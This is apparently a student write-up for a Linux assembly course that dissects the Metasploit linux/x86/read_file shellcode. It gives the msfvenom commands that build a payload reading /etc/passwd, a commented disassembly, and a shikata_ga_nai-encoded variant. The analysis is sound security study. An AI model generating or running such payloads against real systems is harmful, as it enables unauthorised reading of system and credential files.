Student SLAE - 891
Github: https://github.com/phackt/slae
http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Assignment 5.2:

Our Goal:

Take up at least 3 linux/x86 shellcodes using Msfpayload (now Msfvenom)

  • Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcode
  • Present your analysis

Hello everybody,

Here we are for the second analysis of our msf shellcodes. Let’s perform the analysis for the linux/x86/read_file shellcode:

# msfvenom -p linux/x86/read_file --payload-options
Options for payload/linux/x86/read_file:


       Name: Linux Read File
     Module: payload/linux/x86/read_file
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 62
       Rank: Normal

Provided by:
    hal

Basic options:
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
FD    1                yes       The file descriptor to write output to
PATH                   yes       The file path to read

Description:
  Read up to 4096 bytes from the local file system and write it back 
  out to the specified file descriptor
...

Let’s examine the generated shellcode:

# msfvenom -p linux/x86/read_file PATH=/etc/passwd -f raw | ndisasm -u -
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 73 bytes

00000000  EB36              jmp short 0x38
00000002  B805000000        mov eax,0x5
00000007  5B                pop ebx
00000008  31C9              xor ecx,ecx
0000000A  CD80              int 0x80
0000000C  89C3              mov ebx,eax
0000000E  B803000000        mov eax,0x3
00000013  89E7              mov edi,esp
00000015  89F9              mov ecx,edi
00000017  BA00100000        mov edx,0x1000
0000001C  CD80              int 0x80
0000001E  89C2              mov edx,eax
00000020  B804000000        mov eax,0x4
00000025  BB01000000        mov ebx,0x1
0000002A  CD80              int 0x80
0000002C  B801000000        mov eax,0x1
00000031  BB00000000        mov ebx,0x0
00000036  CD80              int 0x80
00000038  E8C5FFFFFF        call dword 0x2
0000003D  2F                das
0000003E  657463            gs jz 0xa4
00000041  2F                das
00000042  7061              jo 0xa5
00000044  7373              jnc 0xb9
00000046  7764              ja 0xac
00000048  00                db 0x00

So let’s comment our shellcode instructions:

    jmp short 0x38  ; jmp/call/pop technique
    mov eax,0x5     ; int open(const char *pathname, int flags);
    pop ebx         ; pop the @ of the string starting at 0x3D
    xor ecx,ecx     ; clears out ecx
    int 0x80        ; open syscall
    mov ebx,eax     ; file descriptor result of the open syscall
    mov eax,0x3     ; ssize_t read(int fd, void *buf, size_t count);
    mov edi,esp     ; 
    mov ecx,edi     ; pointer to a valid stack address
    mov edx,0x1000  ; size of buffer that will be read and buffered to the stack
    int 0x80        ; read syscall
    mov edx,eax     ; result of read and third argument of write function
    mov eax,0x4     ; ssize_t write(int fd, const void *buf, size_t count);
    mov ebx,0x1     ; standard output / ebx is still pointing to the buffer on stack
    int 0x80        ; write syscall
    mov eax,0x1     ; void _exit(int status);
    mov ebx,0x0     ; 0 everything is OK
    int 0x80        ; exit syscall
    call dword 0x2  ; pushing the @ of the following bytes (/etc/passwd) on the stack
    das
    gs jz 0xa4      
    das
    jo 0xa5
    jnc 0xb9
    ja 0xac
    db 0x00         ; null byte ending string

The jmp/call/pop technique will set the address of the following string in EBX:

# echo -e \\x2F\\x65\\x74\\x63\\x2F\\x70\\x61\\x73\\x73\\x77\\x64
/etc/passwd

Once again you can generate a shellcode (quite more complex) without null bytes with the following command:

# msfvenom -p linux/x86/read_file PATH=/etc/passwd -f raw -b \x00 | ndisasm -u -
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 100 (iteration=0)
x86/shikata_ga_nai chosen with final size 100
Payload size: 100 bytes

00000000  BAF7BD341A        mov edx,0x1a34bdf7
00000005  DBDF              fcmovnu st7
00000007  D97424F4          fnstenv [esp-0xc]
0000000B  5E                pop esi
0000000C  29C9              sub ecx,ecx
0000000E  B113              mov cl,0x13
00000010  83EEFC            sub esi,byte -0x4
00000013  31560F            xor [esi+0xf],edx
00000016  0356F8            add edx,[esi-0x8]
00000019  5F                pop edi
0000001A  C1                db 0xc1
0000001B  F1                int1
0000001C  3018              xor [eax],bl
0000001E  2F                das
0000001F  06                push es
00000020  3C58              cmp al,0x58
00000022  6B37F5            imul esi,[edi],byte -0xb
00000025  95                xchg eax,ebp
00000026  0BBEC69E0FC1      or edi,[esi-0x3ef0613a]
0000002C  C8DE8626          enter 0x86de,0x26
00000030  41                inc ecx
00000031  27                daa
00000032  22A841D85364      and ch,[eax+0x6453d841]
00000038  E151              loope 0x8b
0000003A  91                xchg eax,ecx
0000003B  CE                into
0000003C  E561              in eax,0x61
0000003E  16                push ss
0000003F  2F                das
00000040  5E                pop esi
00000041  60                pushad
00000042  16                push ss
00000043  2F                das
00000044  A0AE9697A1        mov al,[0xa19796ae]
00000049  3097E71A3097      xor [edi-0x68cfe519],dl
0000004F  E75C              out 0x5c,eax
00000051  FC                cld
00000052  17                pop ss
00000053  0F9901            setns [ecx]
00000056  E82F0E9B63        call dword 0x639b0e8a
0000005B  B37F              mov bl,0x7f
0000005D  13ED              adc ebp,ebp
0000005F  40                inc eax
00000060  0CA4              or al,0xa4
00000062  89                db 0x89
00000063  A6                cmpsb

We can see, through the analysis of all of these shellcodes, the power of msfvenom while dynamically generating shellcodes.

Hope you enjoyed this post, see you soon for the second msf shellcode analysis.

Phackt